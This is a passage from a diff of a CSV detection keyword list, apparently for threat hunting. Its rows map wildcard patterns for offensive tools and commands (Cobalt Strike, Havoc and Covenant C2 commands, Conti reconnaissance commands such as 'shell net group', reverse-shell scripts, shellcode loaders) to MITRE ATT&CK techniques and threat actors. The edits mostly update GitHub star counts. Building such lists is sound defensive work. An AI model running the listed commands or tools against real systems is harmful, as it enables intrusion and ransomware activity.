- T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpZippo.exe*","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","10","10","55","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z" "*ShawnDEvans/smbmap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ShawnDEvans/smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*shell 'cmd.exe /c*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*ShawnDEvans/smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*shell 'cmd.exe /c*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*shell net group *Domain Computers* /domain*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell net localgroup administrators*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell nltest /dclist*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -16798,34 +16981,34 @@ "*shell whoami /user*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*shell whoami*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell.exe -s payload.txt*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" -"*shell_shocked*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*shell_shocked*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*shell_startup_files_modification.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*shell_shocked*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*shell_shocked*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*shell_startup_files_modification.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*Shell3er.ps1*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*shellc *.bin *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*shellc *.shellc *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*ShellCmd cmd.exe *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*ShellCmd copy *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*ShellCmd net *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*ShellCmd sc qc *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*ShellCmd cmd.exe *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*ShellCmd copy *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*ShellCmd net *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*ShellCmd sc qc *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*SHELLCODE GENERATOR*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*shellcode inject *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*shellcode inject *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*Shellcode Injected Successfully*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" -"*shellcode spawn *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*shellcode*shellcode.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*shellcode spawn *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*shellcode*shellcode.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*shellcode.asm*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" -"*Shellcode.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*Shellcode.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*shellcode_dll.dll*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","","N/A","","","" "*shellcode_dll\*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","","N/A","","","" "*shellcode_dotnet2js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*shellcode_dropper.c*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*shellcode_dynwrapx*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Shellcode_encryption.exe*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" -"*shellcode_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*shellcode_generator.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" -"*shellcode_generator_help.html*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" -"*shellcode_inject.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1393","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" -"*shellcode_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*shellcode_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - 